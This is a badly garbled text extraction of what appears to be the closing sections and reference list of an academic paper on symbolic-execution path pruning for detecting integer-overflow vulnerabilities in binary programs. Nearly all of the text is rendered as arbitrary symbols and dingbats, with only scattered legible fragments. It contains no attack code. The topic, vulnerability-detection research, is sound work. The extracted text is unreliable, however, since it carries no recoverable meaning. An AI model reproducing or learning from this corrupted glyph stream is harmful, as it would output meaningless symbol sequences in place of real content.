➩s ❜✞ ✁ ✟ ☎  ✠ 1 ✠   ☛ t ☎ ✁ ✆ ☎ ✒ ✠ 1 ♣ ✠ ✆ ✒☎ ✈ ✠ ☎ ✆ ✞ ✁ t ✑ ✒♣ ✠ ✠ ✄ ❛ ✆ ✄ ✒♣ ❛   ✠ ✓ ■ ✆   ✁ ✆ t ✂ ❛ ✒ tt ✁ ✒s ❜✞ ✁ ✟ ☎   ❛ ♣ ♣ ✂ ✁ ❛   ✑ ✡ ✇ ✠ ✄ ✁ ✆ ✁ t ✆ ✠ ✠ ✄ t ✁ ✒s ❜✞ ✁ ✟ ☎   ❛ ✟ ✟ s✠ 1 ✠   ☛ t ✠ t ✑ ✠ ♣ ❛ t ✑ ✓ ➭ ☛ ✂ ❛ ♣ ♣ ✂ ✁ ❛   ✑   ✑ ✠   ✳ ✒ ✇ ✑ ✠ t ✑ ✠ ✂ t ✑ ✠ ♣ ❛ t ✑❢ ❛ ✟ ✟ ✒ ☎ ✆ t ✁ ❛ ✆ s t s ♣ ✠ ✁ ❢ ◆ ✎ ☞ ✏   ❛ ☛ ✒ ✠ ✄ ✞ s t ✑ ✠ t ✑ ✂ ✠ ✠ ♣ ❛ t t ✠ ✂ ✆ ✒✓❚ ✑ ✠   ✑ ✠   ✳ ☎ ✆ ✝   ❛ ✆ ✠ ❛ ✒☎ ✟ s ✞ ✠ ✄ ✁ ✆ ✠ ✞ s ✝ ✁ ☎ ✆ ✝ t ✑ ✂ ✁ ☛ ✝ ✑ ❛ ✟ ✟✆ ✁ ✄ ✠ ✒ ☎ ✆ t ✑ ✠ ♣ ❛ t ✑ t ✁ ❜❛ ✳ ✠ ✒☛ ✂ ✠ t ✑ ❛ t t ✑ ✠ s ❢ ✁ ✟ ✟ ✁ ✇   ✠ ✂ t ❛ ☎ ✆  ✁ ✆ t ✂ ✁ ✟ ❛ ✆ ✄ ✄ ❛ t ❛ ✄ ✠ ♣ ✠ ✆ ✄ ✠ ✆   s ✂ ✠ ✟ ❛ t ☎ ✁ ✆ ✒✑ ☎ ♣ ✒✓ ❚ ✑ ✠ ♣ ✠ ✂ ❢ ✁ ✂ ❜ ❛ ✆   ✠✁ ❢ ✁ ☛ ✂ ❛ ♣ ♣ ✂ ✁ ❛   ✑ ☎ ✒   ✁ ❜ ♣ ❛ ✂ ❛ ✞ ✟ ✠ t ✁ t ✑ ✁ ✒ ✠ ❛ ♣ ♣ ✂ ✁ ❛   ✑ ✠ ✒ ✇ ✑ ☎   ✑❛ ✂ ✠ ✞ ❛ ✒ ✠ ✄ ✁ ✆ ✑ ✠ ☛ ✂ ☎ ✒ t ☎   ✒ t ✑ ❛ t ✑ ❛ ✈ ✠ ✞ ✠ ✠ ✆ ✠ ❜ ♣ ☎ ✂ ☎   ❛ ✟ ✟ s ✈ ❛ ✟ ☎ ✄ ❛ t ✠ ✄❬ ✷ ✹ ✦ ✡ ❬ ✷
★✦ ✓ ✏ ✁ ✇ ✠ ✈ ✠ ✂ ✡ ✇ ✠ ✁ ✆ ✟ s ❢ ✁   ☛ ✒ ✁ ✆ ♣ ❛ t ✑ ✒ ☎ ✆ ✄ ✠ t ✠   t ☎ ✆ ✝☎ ✆ t ✠ ✝ ✠ ✂ ✞ ☛ ✝ ✒✓
❫✠ ☎ ❜ ♣ ✂ ✁ ✈ ✠ ✁ ✆ t ✑ ✠ ✠ ❛ ✂ ✟ ☎ ✠ ✂ ❛ ♣ ♣ ✂ ✁ ❛   ✑ ✠ ✒ ☎ ✆ t ✑ ❛ t
99
✇   ♣ ✁ ✂ ✈ ✄ ☎   t ✆ ✁       ❡ ♣ ✄ ✁ ✄ ✝ ✞ ✟ ♣ ✞ t t   ✁ ✠ ✡ ✭ ✆   ☛ ✁ ✄ ✡ t ✄ ✝ ✡☞ ✇ ✆ ✄ ✝ ✆ ♣ ✁ ☛ ✠  ❡☛ ✝ ✆ ♣ ✂ ✁ t ✄ ✂ ✠ ✂♦
t ✂ t ✞ ✟ ♣ ✞ t ✆ ✡✌❚
✆   ✁   ✞ ✁   ✞ ✟ ✡ ✂ ✂ t ✆   ✁ t✍
♣   ✡ ✂♦
✞ ♣ ♣ ✁ ✂ ✞ ✝ ✆   ✡ t ✂ ✞ ✟ ✟ ✄ ✈ ✄ ✞ t  ♣ ✞ t ✆  1
♣ ✟ ✂ ✡✄ ✂ ✠ ♣ ✁ ✂✎
✟   ❡✡✌ ❇
✂ ✂ ✠ ✡ t ✂ ♣ ♣   ✟✏ ✑ ✑ ✒
♣ ✁ ☛ ✠   t ✆   ♣ ✞ t ✆✇ ✆ ✄ ✝ ✆ ✆ ✞ ✡ ✞ ✡✄ ❡✄ ✟ ✞ ✁ ♣ ✁ ✂ ✓ ✁ ✞ ❡ ✡ t ✞ t   ✝ ✂ ❡ ♣ ✞ ✁   ✇ ✄ t ✆  1
♣ ✟ ✂ ✁   ☎✌■ ✠ t ✡ ✝ ✂ ♣  ✏
✔✒
✄ ✡ ♣ ✁ ✂ ♣ ✂ ✡  ☎✎
✞ ✡  ☎ ✂ ✠ t ✞ ✄ ✠ t ♣ ✁ ✂ ♣ ✞ ✓ ✞ t ✄ ✂ ✠ ✕ ✂ ✠ ✟✍✞ ✠ ✞ ✟✍
✡  ✡ t ✞ ✄ ✠ t   ☎ ♣ ✞ t ✆✌ ❇
✞ ✁ ☎ ✄ ✠✏ ✑
✖✒
♣ ✁   ✡  ✠ t ✞ ❦ ✄ ✠ ☎ ✂♦
☛ ✠ ✄ t✝ ✂ ✈   ✁ ✝ ✂ ✠ ✝   ♣ t ✕ ♣ ✁ ☛ ✠   ✡ t ✆  ✎
✁ ✞ ✠ ✝ ✆ ✇ ✆ ✄ ✝ ✆ ☎ ✂   ✡ ✠ ✂ t ✝ ✂ ✈   ✁ ✠   ✇☛ ✠ ✄ t ✡✌ ❈
✂ ❡ ♣ ✞ ✁   ☎ ✇ ✄ t ✆ t ✆   ✡  ✞ ♣ ♣ ✁ ✂ ✞ ✝ ✆   ✡✕ t ✆   ♣ ✞ ♣   ✁✗
✡ ♣ ✂ ✄ ✠ t ✂♦♣ ✁ ☛ ✠ ✄ ✠ ✓ ♣ ✞ t ✆ ✡ ✄ ✡ ☎ ✄♦ ♦
  ✁   ✠ t✌ ❚
✆   ✡  ✞ ♣ ♣ ✁ ✂ ✞ ✝ ✆   ✡ ✝ ✞ ✠✎
☛ ✄ ✟ t ✂ ✠ ✂ ☛ ✁❡  t ✆ ✂ ☎ t ✂ ✓   t ✞ ✆ ✄ ✓ ✆   ✁ ♣ ✁ ☛ ✠ ✄ ✠ ✓  ♦
➇ ✝ ✄   ✠ ✝✍ ✌❱ ■✌ ❈
❖ ✘ ✙ ✚ ✛ ✜ ✢ ❖ ✘■ ✠ t ✆ ✄ ✡ ♣ ✞ ♣   ✁ ✕ ✇   ✆ ✞ ✈   ♣ ✁   ✡  ✠ t   ☎ ✞ ✆   ☛ ✁ ✄ ✡ t ✄ ✝ ♣ ✞ t ✆ ♣ ✁ ☛ ✠ ✄ ✠ ✓✞ ✟ ✓ ✂ ✁ ✄ t ✆ ❡ ✇ ✆   ✠ ☛ ✡✄ ✠ ✓ ✡✍
❡✎
✂ ✟ ✄ ✝  1
  ✝ ☛ t ✄ ✂ ✠ t ✂ ✞ ☛ t ✂ ❡✞ t ✄ ✝ ✞ ✟ ✟✍☎   t   ✝ t ✄ ✠ t   ✓   ✁ ✈ ☛ ✟ ✠   ✁ ✞✎
✄ ✟ ✄ t ✄   ✡ ✄ ✠ ✟ ✞ ✁ ✓   ✡ ✝ ✞ ✟   ✂♦ ✎
✄ ✠ ✞ ✁ ✄   ✡✌
❋ ✄ ✁ ✡ t ✣✟✍
✕ ✇   ☛ ✡  t ✆ ✁     ♣ ✞ t t   ✁ ✠ ✡ t ✂ ✁   ✝ ✂ ✓ ✠ ✄ r   ◆ ❋ ✤ ✥ ♣ ✞ t ✆ ✡ ✄ ✠✎
✄ ✠ ✞ ✁✍✝ ✂ ☎  ✌ ❚
✆   ✠ ✡ t ✂ ♣ ✞ ✠ ✞ ✟✍
r ✄ ✠ ✓ ◆ ❋ ✤ ✥ ♣ ✞ t ✆ ✡ ✇ ✆   ✠ ☛ ✡✄ ✠ ✓ ✡✍
❡✎
✂ ✟ ✄ ✝ 1
  ✝ ☛ t ✄ ✂ ✠✌ ❲
  ✆ ✞ ✈   ✄ ❡ ♣ ✟   ❡  ✠ t   ☎ ✂ ☛ ✁ ✞ ♣ ♣ ✁ ✂ ✞ ✝ ✆ ✄ ✠ ♣ ✁ ✂ t ✂ t✍
♣  t ✂ ✂ ✟P
✁ ☛ ✠ ✤✎
t✌
✤1
♣   ✁ ✄ ❡  ✠ t ✞ ✟ ✁   ✡☛ ✟ t ✡ ✡ ✆ ✂ ✇ t ✆ ✞ tP
✁ ☛ ✠ ✤✎
t ✄ ✡✆ ✄ ✓ ✆ ✟✍
 ♦ ♦
  ✝ t ✄ ✈   ✞ ✠ ☎ ♣ ✁ ✞ ✝ t ✄ ✝ ✞ ✟✌ P
✁ ☛ ✠ ✤✎
t ✡✄ ✓ ✠ ✄ ➇ ✝ ✞ ✠ t ✟✍
✁   ☎ ☛ ✝  t ✆   ✡  ✞ ✁ ✝ ✆ ✡ ♣ ✞ ✝   ✞ ✠ ☎ ✆ ✞ ✈   ✠ ✂♦
✞ ✟ ✡  ♣ ✂ ✡✄ t ✄ ✈   ✡✌ ❲
 ♦
✂ ☛ ✠ ☎ ✂ ✠  r   ✁ ✂ ✣ ☎ ✞✍
✄ ✠ t   ✓   ✁ ✂ ✈   ✁ ✦ ✂ ✇ ✈ ☛ ✟ ✠   ✁ ✞✎
✄ ✟ ✄ t✍
✄ ✠ ♣ ✂ ♣ ☛ ✟ ✞ ✁ ✡ ✂♦
t ✇ ✞ ✁  ♣ ✞ ✝ ❦ ✞ ✓   ✟ ✄✎
♣ ✠ ✓✌❆
✙✧
✘ ❖★
✚✩ ✪ ✫ ✬ ✩
✘✮❚
✆ ✞ ✠ ❦ ✡♦
✂ ✁ t ✆   ✞ ✠ ✂ ✠✍
❡ ✂ ☛ ✡ ✁   ✈ ✄   ✇   ✁ ✡✗
✡ ✝ ✂ ❡❡  ✠ t ✡ ✞ ✠ ☎✞ ☎ ✈ ✄ ✝   ✡✌ ❚
✆ ✄ ✡ ✁   ✡  ✞ ✁ ✝ ✆ ✄ ✡ ✡☛ ♣ ♣ ✂ ✁ t   ☎✎ ✍
t ✆   ◆ ✞ t ✄ ✂ ✠ ✞ ✟ ✥ ✄ ✓ ✆❚
  ✝ ✆ ✠ ✂ ✟ ✂ ✓✍
❘   ✡  ✞ ✁ ✝ ✆ ✞ ✠ ☎ ❉   ✈   ✟ ✂ ♣ ❡  ✠ tP
✁ ✂ ✓ ✁ ✞ ❡ ✂♦ ❈
✆ ✄ ✠ ✞☛ ✠ ☎   ✁ ● ✁ ✞ ✠ t ◆ ✂✌
✯ ✖✑ ✑ ❆ ❆
✖✑ ❆
✯ ✖ ✰ ✞ ✠ ☎ t ✆   ◆ ✞ t ✄ ✂ ✠ ✞ ✟ ◆ ✞ t ☛ ✁ ✞ ✟❙
✝ ✄   ✠ ✝   ❋ ✂ ☛ ✠ ☎ ✞ t ✄ ✂ ✠ ✂♦ ❈
✆ ✄ ✠ ✞ ☛ ✠ ☎   ✁ ● ✁ ✞ ✠ t ◆ ✂✌
✔ ✖✱ ✲
✖ ✖ ✯✳ ✌❘✩ ❊ ✩ ✴ ✩
✘ ✙✩
✜❬ ✵ ✶ ✷ ✸ ✹ ✸ ✺ ✻ 2 ✼✽ ✾ ✺ ✸ ✿ ❀ ❁ ❂ ❃ ❁ ✾ ❃❛ ❄ ❑ ✸ ❅ ✸ ▲ ✼ ❍ ❏ ▼ ▼ ✾ ➁✹ ✿ ▲ ✿ ◗ ❯ ❃ ❢ ✻ ✽ ❳ ❃❀❁ 2 ❁ ▼ ✼❳ ❢ ✻ ✽ ▼ ✼ ❁ ▼ ❏ ❛❨
❃❛ ❄ ❄ ✼❞ ✉ ❨ ❨
❏ ❛❨
❂ ✽ ✻❨
✽ ❃❳ ❁❞
2 ❁ 2 ❳❞
✻ ❀ ❏s✼ ❩ ✼s✉
▼ ❏ ✻ ❛ ✾ ➂ ❏ ❛ ❭ ❪ ❫ ❴ ❵ ❜ ❝ ❣ ❤ ✐ ❥ ❧ ♠ ❵ ♥q3 ✾ ❍ ✻ ❀ ✸ ✵ 4 ✾ ❛ ✻ ✸ 5 ✸ 6 ◗ 7 ✾✵ 8 9 10 ✾ ❂ ❂ ✸ ❶ ❷ ❸ ❹ ❶ ❸ 10 ✸❬ ❶ ✶❺
✸ ◗ ✸ ❑ ❏ ❛❨
✾ ➁✹ 2 ❳❞
✻ ❀ ❏s
✼ ❩ ✼s✉
▼ ❏ ✻ ❛ ❃❛ ❄ ❂ ✽ ✻❨
✽ ❃❳ ▼ ✼ ❁ ▼ ❏ ❛❨
✾ ➂ ❪ ❧❻ ❼❻ ❽
✐ ❵ ♥ ❤ ♠ ❵ ❧ ✐ 3 ❧❾
♠❿
q ❭ ❪ ❫ ✾ ❍ ✻ ❀ ✸ ✵ 8 ✾ ❛ ✻ ✸ 9 ✾ ❂ ❂ ✸ ❷➀
10 ❹ ❷ 8 ❸ ✾ ✵ 8 9 5 ✸❬ ❷ ✶ ◗ ✸ ◗ ❃❄ ❃✽ ✾ ➃ ✸ ➄ ❃❛ ✼ ❁ ➅ ✾ ➆ ✸ 7 ✸ ➆ ❃➈ ❀ ✻ ➈ ❁ ➉ ❏ ✾ ➊ ✸ ▲ ✸ ➊ ❏ ❀ ❀ ✾ ❃❛ ❄ ➊ ✸ ✷ ✸✿ ❛❨
❀ ✼✽ ✾ ➁✿ ❩ ✼➋ ❃✉
▼ ✻ ❳ ❃ ▼ ❏s
❃❀ ❀ 2❨
✼❛ ✼✽ ❃ ▼ ❏ ❛❨
❏ ❛ ❂✉
▼ ❁ ✻ ❢ ❄ ✼❃ ▼ ➅ ✾ ➂ ❭ ❪ ❫➌ ➍
❤ ✐ 3 ❤ ♥ ♠ ❵ ❧ ✐ 3 ❧ ✐➎
✐❾
❧➍ ❻
❤ ♠ ❵ ❧ ✐ ❤ ✐➏
❴➐
3 ♠ q❻
❴ q♥❽ ➍
❵ ♠➐ ➑ ➌ ➎
❴ ❴➒
❪➓
✾❍ ✻ ❀ ✸ ✵ ❶ ✾ ❛ ✻ ✸ ❶ ✾ ❂ ✸ ✵ 4 ✾ ❶ 4 4➀
✸❬ ❸ ✶ ❑ ✸ ✹ ✼❛ ✾ ➊ ✸ 7 ❃✽ ❏ ❛ ✻ ❍ ✾ ❃❛ ❄ ➄ ✸ 6❨
➅ ❃✾ ❪ ➔➌ ➒
→ ❤ ♥ ❧ ✐ ♥ ❧ ❣ ❵ ♥❽
✐ ❵ ♠♠ q3 ♠ ❵ ✐ ❜ q ✐ ❜ ❵ ✐ q❾
❧➍
❪ ✸ 6 ◗ 7 ✾ ❶ 4 4 10 ✾ ❍ ✻ ❀ ✸ ❷ 4 ✾ ❛ ✻ ✸ 10 ✸❬ 10 ✶ ➆ ✸ ➄ ✻ ❄ ✼❢ ✽ ✻ ❏ ❄ ✾ ❅ ✸ ❑ ❀ ❃✽ ❀✉
❛ ❄ ✾ ❃❛ ❄ ❑ ✸ ✹ ✼❛ ✾ ➁ ➊ ❃✽ ▼ ➋ ❄ ❏ ✽ ✼s
▼ ✼❄ ❃✉ ➣▼ ✻ ❳ ❃ ▼ ✼❄ ✽ ❃❛ ❄ ✻ ❳ ▼ ✼ ❁ ▼ ❏ ❛❨
✾ ➂ ❏ ❛ ❭ ❪ ❫ ❴ ❵ ❜ ↔ ❣ ❤ ✐ ❥ ❧ ♠ ❵ ♥q3 ✾ ❍ ✻ ❀ ✸ ❸ 4 ✾❛ ✻ ✸ 5 ✸ 6 ◗ 7 ✾ ❶ 4 4 10 ✾ ❂ ❂ ✸ ❶ ✵ ❷ ❹ ❶ ❶ ❷ ✸❬ 5 ✶ ❯ ✸↕
❃❛❨
✾ ❯ ✸↕
✼❏ ✾➙
✸ ▲ ❏ ❛ ✾ ❃❛ ❄↕
✸➙
✻✉
✾ ➁➛
❛ ▼ ❁s
✻ ❂ ✼➋ 6✉
▼ ✻ ❳ ❃ ▼➣❏s
❃❀ ❀ 2 ❄ ✼ ▼ ✼s
▼ ❏ ❛❨
❏ ❛ ▼ ✼❨
✼✽ ✻ ❍ ✼✽➜
✻ ➈ ❍✉
❀ ❛ ✼✽ ❃❞
❏ ❀ ❏ ▼ 2 ❏ ❛ ❩➀
5❞
❏ ❛ ❃✽ 2✉
❁ ❏ ❛❨
❁ 2 ❳❞
✻ ❀ ❏s
✼ ❩ ✼s✉
▼ ❏ ✻ ❛ ✾ ➂ ❏ ❛ ❥ q ♠ ➝ ❧➍
➞ ➟ ❵ 3 ♠➍
❵ ➠❽
♠ q➏
❴ q♥❽ ➍
❵ ♠➐❴➐❻
↔ ❧ 3 ❵❽ ❻ ➑
❥ ➟ ❴ ❴➓
✸ ◗ ❏ ▼ ✼ ❁ ✼✼✽ ✾ ❶ 4 4 8 ✸❬ 9 ✶ ➊ ✸➡
✼❄ ❀ ✼ 2 ❃❛ ❄ 7 ✸ 6 ✸➡
✼❛ ❛ ✼❀ ❀ ✾ ➁ ❯ ➅ ✼s
❃✉
❁ ✼ ❁ ❃❛ ❄ ✼❢ ❢ ✼s
▼ ❁ ✻ ❢❏ ❛ ❢ ✼❃ ❁ ❏❞
❀ ✼ ❂ ❃ ▼ ➅ ❁ ❏ ❛s
✻ ❳ ❂✉
▼ ✼✽ ❂ ✽ ✻❨
✽ ❃❳ ❁ ✾ ➂ ❏ ❛ ❝➍
❧ ♥qq➏
❵ ✐ ❜ 3 ❧❾
♠❿
q➢
♠❿
❵ ✐ ♠ q➍
✐ ❤ ♠ ❵ ❧ ✐ ❤ ❣ ♥ ❧ ✐❾
q➍
q ✐ ♥q ❧ ✐ ❴ ❧❾
♠ ➝ ❤➍
q q ✐ ❜ ❵ ✐ qq➍
❵ ✐ ❜ ✸➛
✿ ✿ ✿◗ ✻ ❳ ❂✉
▼ ✼✽ ✹ ✻s
❏ ✼ ▼ 2 ➆ ✽ ✼ ❁ ❁ ✾ ✵ 8➀
10 ✾ ❂ ❂ ✸ ❶ 10 8 ❹ ❶ 5 5 ✸
❬➀
✶➤
✸↕
❃❛❨
✾➡
✸ ◗ ➅ ✼❛ ✾➙
✸❺
❏ ❃✾ ❅ ✸➙
✼❀ ❄ ✻ ❍ ❏s
➅ ✾ ❃❛ ❄ 7 ✸➥
✸ ❑ ❃❃ ❁ ➅ ✻ ✼ ➉ ✾➁➛
❳ ❂ ✽ ✻ ❍ ❏ ❛❨
❏ ❛ ▼ ✼❨
✼✽ ❁ ✼s✉
✽ ❏ ▼ 2 ❢ ✻ ✽ ❁ 2 ❁ ▼ ✼❳ ❁ ➈ ❏ ▼ ➅ ➉ ❏ ❛ ▼ ✾ ➂ ❏ ❛ ❝➍
❧❼♥qq➏
❵ ✐ ❜ 3 ❧❾
♠❿
q➦ ➧
♠❿
➔ ❴➒
❥➎ ➨
♥ ❧ ✐❾
q➍
q ✐ ♥q ❧ ✐➩
↔ q➍
❤ ♠ ❵ ✐ ❜ ❴➐
3❼♠ q❻
3 ➟ q3 ❵ ❜ ✐ ❤ ✐➏ ➎ ❻
↔ ❣ q❻
q ✐ ♠ ❤ ♠ ❵ ❧ ✐ ✸ ➫ ✹ ✿ ❅➛ ➤
6 ❁ ❁ ✻s
❏ ❃ ▼ ❏ ✻ ❛ ✾❶ 4 ✵ ❶ ✾ ❂ ❂ ✸ ✵ 5 ❷ ❹ ✵ 9 9 ✸❬ 8 ✶ ➁◗ ✻ ❳ ❳ ✻ ❛ ❍✉
❀ ❛ ✼✽ ❃❞
❏ ❀ ❏ ▼ ❏ ✼ ❁ ❃❛ ❄ ✼ ❩ ❂ ✻ ❁✉
✽ ✼ ❁ ◗ ➃ ✿ ✾ ➂➅ ▼ ▼ ❂ ➋➭ ➭ s
❍ ✼ ✸ ❳ ❏ ▼ ✽ ✼ ✸ ✻ ✽❨ ➭
✸❬ ✵ 4 ✶ ✹ ✸ ✺ ❃✽ ❄ ❏ ❛ ❃❛ ❄ ➆ ✸➡
✼ ✽ ✽ ❳ ❃❛ ❛ ✾ ➁ ➆ ✽✉
❛ ❏ ❛❨
▼ ➅ ✼ ❁ ✼❃✽s
➅ ❁ ❂ ❃s
✼ ❏ ❛❂ ❃ ▼ ➅➣ ❞
❃ ❁ ✼❄ ▼ ✼ ❁ ▼❨
✼❛ ✼✽ ❃ ▼ ❏ ✻ ❛ ✾ ➂ ❏ ❛ ❴ ❧❾
♠ ➝ ❤➍
q➌
q3 ♠ ❵ ✐ ❜➯
q➍
❵➲
♥ ❤ ♠ ❵ ❧ ✐❤ ✐➏ ➯
❤ ❣ ❵➏
❤ ♠ ❵ ❧ ✐➳ ➵ ➧ ➧ ➸ ➺ ➎
❪ ❴➌ ➻ ➧ ➸ ➺ ➎
✐ ♠ q➍
✐ ❤ ♠ ❵ ❧ ✐ ❤ ❣ ❪ ❧ ✐❾
q➍
q ✐ ♥q ❧ ✐ ✸➛
✿ ✿ ✿ ✾ ❶ 4 4 8 ✾ ❂ ❂ ✸ ❶ ❸ 4 ❹ ❶ ❸ 8 ✸❬ ✵ ✵ ✶ ➆ ✸ ✺ ✻ ✻ ❛ ❁ ▼ ✻ ❂ ❂ ✼❀ ✾ ◗ ✸ ◗ ❃❄ ❃✽ ✾ ❃❛ ❄ ➊ ✸ ✿ ❛❨
❀ ✼✽ ✾ ➁ ✷ ➈ ❁ ✼ ▼ ➋ 6 ▼ ▼ ❃s
➉ ❏ ❛❨❂ ❃ ▼ ➅ ✼ ❩ ❂ ❀ ✻ ❁ ❏ ✻ ❛ ❏ ❛s
✻ ❛ ❁ ▼ ✽ ❃❏ ❛ ▼➣ ❞
❃ ❁ ✼❄ ▼ ✼ ❁ ▼❨
✼❛ ✼✽ ❃ ▼ ❏ ✻ ❛ ✾ ➂➌
❧ ❧ ❣ 3 ❤ ✐➏❭ ❣ ❜ ❧➍
❵ ♠❿ ❻
3❾
❧➍
♠❿
q ❪ ❧ ✐ 3 ♠➍ ❽
♥ ♠ ❵ ❧ ✐ ❤ ✐➏
❭ ✐ ❤ ❣➐
3 ❵ 3 ❧❾
❴➐
3 ♠ q❻
3 ✾ ❂ ❂ ✸❷ 10 ✵ ❹ ❷ 5 5 ✾ ❶ 4 4➀
✸❬ ✵ ❶ ✶ ➁ ➆ ❅ ➄ ❀ ❏❞
✽ ❃✽ 2 ✾ ➂ ➅ ▼ ▼ ❂ ➋➭ ➭
➈ ➈ ➈ ✸ ❀ ❏❞
❂ ❛❨
✸ ✻ ✽❨ ➭
❂✉ ❞ ➭
❂ ❛❨ ➭
❀ ❏❞
❂ ❛❨
✸➅ ▼ ❳ ❀ ✸❬ ✵ ❷ ✶ ➄ ✸ ➼✉
✼❀ ❏ ❛❨
✾ ➁ 6 ❛ ❃❀ 2 ❁ ❏ ❁ ❃❛ ❄s
✻ ❳ ❂ ❃✽ ❏ ❁ ✻ ❛ ✻ ❢ ❁ ✼ ❍ ✼ ✽ ❃❀ ✼✽ ✽ ✻ ✽ ➅ ❃❛ ❄ ❀ ✼❳ ✻ ❄ ✼❀ ❁ ✾ ➂➽
❧❽ ➍
✐ ❤ ❣ ❧❾ ➾ ❽ ❿
❤ ✐ ➔ ✐ ❵➚
q➍
3 ❵ ♠➐
❧❾ ➌
q♥❿
✐ ❧ ❣ ❧ ❜➐
✾ ❍ ✻ ❀ ✸ ❶ ❸ ✾❛ ✻ ✸ ❸ ✾ ❂ ❂ ✸ ✵ ✵ ❷ ❹ ✵ ✵ 5 ✾ ❶ 4 4 ❶ ✸❬ ✵ ❸ ✶ ➁➛
❄ ❃ ❂ ✽ ✻ ❄ ❏ ❁ ❃ ❁ ❁ ✼❳❞
❀ ✼✽ ✾ ➂ ➅ ▼ ▼ ❂ ➋➭ ➭
➈ ➈ ➈ ✸ ❄ ❃ ▼ ❃✽ ✼ ❁s✉
✼ ✸s
✻ ❳➭
❏ ❄ ❃❞
❃ ❁ ✼ ✸❬ ✵ 10 ✶ ➊ ✸ ✹ ✻ ❛❨
✾ ➊ ✸ ✺ ✽✉
❳ ❀ ✼ 2 ✾➡
✸ ➼ ❏ ❛ ✾❺
✸ ◗ ❃❞
❃❀ ❀ ✼✽ ✻ ✾➛
✸❺
❃❨
✼✽ ✾ 7 ✸ ❑ ❃❛❨
✾➙
✸ ▲ ❏ ❃❛❨
✾❺
✸ ❅ ✼ ➈ ❁ ✻ ❳ ✼✾ ➆ ✸ ➆ ✻ ✻ ❁ ❃❛ ➉ ❃❳ ✾ ❃❛ ❄ ➆ ✸ ✹ ❃❩ ✼❛ ❃✾ ➁✺ ❏ ▼➣❞
❀ ❃➪✼➋ 6 ❛ ✼ ➈ ❃❂ ❂ ✽ ✻ ❃s
➅ ▼ ✻s
✻ ❳ ❂✉
▼ ✼✽ ❁ ✼s✉
✽ ❏ ▼ 2 ❍ ❏ ❃❞
❏ ❛ ❃✽ 2❃❛ ❃ ❀ 2 ❁ ❏ ❁ ✾ ➂➎
✐❾
❧➍ ❻
❤ ♠ ❵ ❧ ✐ 3➐
3 ♠ q❻
3 3 q♥❽ ➍
❵ ♠➐
✾ ❂ ❂ ✸ ✵ ❹ ❶ 10 ✾ ❶ 4 4➀
✸❬ ✵ 5 ✶ ➁◗ ✼ ❩ ❏ ❢ ❀ ❏❞
✽ ❃✽ 2 ✾ ➂ ➅ ▼ ▼ ❂ ➋➭ ➭
❀ ❏❞
✼ ❩ ❏ ❢ ✸❁ ✻✉
✽s
✼❢ ✻ ✽❨
✼ ✸ ❛ ✼ ▼ ✸❬ ✵ 9 ✶ ➁✹ ✹➡
▲ ❏❞
✽ ❃✽ 2 ✾ ➂ ➅ ▼ ▼ ❂ ➋➭ ➭
➈ ➈ ➈ ✸ ❀ ❏❞
❁ ❁ ➅ ✸ ✻ ✽❨ ➭
✸❬ ✵➀
✶ ➁ ❯➛ ➥ ➥
▲ ❏❞
✽ ❃✽ 2 ❃❛ ❄ ➫ ▼ ❏ ❀ ❏ ▼ ❏ ✼ ❁ ✾ ➂ ➅ ▼ ▼ ❂ ➋➭ ➭
➈ ➈ ➈ ✸ ❀ ❏❞
▼ ❏ ❢ ❢ ✸ ✻ ✽❨ ➭
✸❬ ✵ 8 ✶ ➁ ➄ ❏ ❢ ❀ ❏❞
✽ ❃✽ 2 ✾ ➂ ➅ ▼ ▼ ❂ ➋➭ ➭ ❨
❏➜
❏❞
✸❁ ✻✉
✽s
✼❢ ✻ ✽❨
✼ ✸ ❛ ✼ ▼ ✸❬ ❶ 4 ✶➥
✸❺
✸ ➄ ✽ ❃❍ ✼ ▼ ▼ ✼✽ ❃❛ ❄ ▲ ✸ ✺ ✸↕
❃❀ ❀ ❛ ❃✉
✾➒
3 3 q ✐ ♠ ❵ ❤ ❣ 3 ❧❾
3 ♠ ❤ ♠ ❵ 3 ♠ ❵ ♥3❾
❧➍♠❿
q ➠ q❿
❤➚
❵ ❧➍
❤ ❣ 3 ♥❵ q ✐ ♥q3 ✸↕
❃❄ ❁ ➈ ✻ ✽ ▼ ➅ ➆✉ ❞
❀ ❏ ❁ ➅ ❏ ❛❨
◗ ✻ ❳ ❂ ❃❛ 2 ✾❶ 4 4➀
✸❬ ❶ ✵ ✶↕
✸ ✷ ✸ ✺✉
❁ ➅ ✾❺
✸ ➊ ✸ ➆ ❏ ❛s✉
❁ ✾ ❃❛ ❄ ➊ ✸❺
✸ ✹ ❏ ✼❀ ❃❢ ❢ ✾ ➁ 6 ❁ ▼ ❃ ▼ ❏s
❃❛ ❃❀ 2 ➪✼✽❢ ✻ ✽ ➶ ❛ ❄ ❏ ❛❨
❄ 2 ❛ ❃❳ ❏s
❂ ✽ ✻❨
✽ ❃❳ ❳ ❏ ❛❨
✼✽ ✽ ✻ ✽ ❁ ✾ ➂ ❴ ❧❾
♠ ➝ ❤➍
q❼
❝➍
❤ ♥ ♠ ❵ ♥q❤ ✐➏ ➒ ➹
↔ q➍
❵ q ✐ ♥q✾ ❍ ✻ ❀ ✸ ❷ 4 ✾ ❛ ✻ ✸ 9 ✾ ❂ ❂ ✸ 9 9 10 ❹➀
4 ❶ ✾ ❶ 4 4 4 ✸❬ ❶ ❶ ✶ ➆ ✸ ➄ ✻ ❄ ✼❢ ✽ ✻ ❏ ❄ ✾ 7 ✸ ➼ ✸ ▲ ✼ ❍ ❏ ❛ ✾ ➊ ✸ 7 ✻ ❀ ❛ ❃✽ q ♠ ❤ ❣➺
✾ ➁ 6✉
▼ ✻ ❳ ❃ ▼ ✼❄➈ ➅ ❏ ▼ ✼❞
✻ ❩ ❢✉
➪➪ ▼ ✼ ❁ ▼ ❏ ❛❨
✸ ➂ ❅ ➊ ✹ ✹ ✾ ❶ 4 4➀
✸❬ ❶ ❷ ✶ ➊ ✸ 7 ✻ ❀ ❛ ❃✽ ✾➤
✸ ◗ ✸ ▲ ❏ ✾ ❃ ❛ ❄ ➊ ✸ 6 ✸↕
❃❨
❛ ✼✽ ✾ ➁ ➊ 2 ❛ ❃❳ ❏s
▼ ✼ ❁ ▼❨
✼❛ ✼✽ ❃ ▼ ❏ ✻ ❛ ▼ ✻ ➶ ❛ ❄ ❏ ❛ ▼ ✼❨
✼✽❞ ✉ ❨
❁ ❏ ❛ ❩➀
5❞
❏ ❛ ❃✽ 2 ❀ ❏ ❛✉
❩ ❂ ✽ ✻❨
✽ ❃❳ ❁ ✾ ➂❏ ❛ ❝➍
❧ ♥qq➏
❵ ✐ ❜ 3 ❧❾
♠❿
q➦ ➢
♠❿
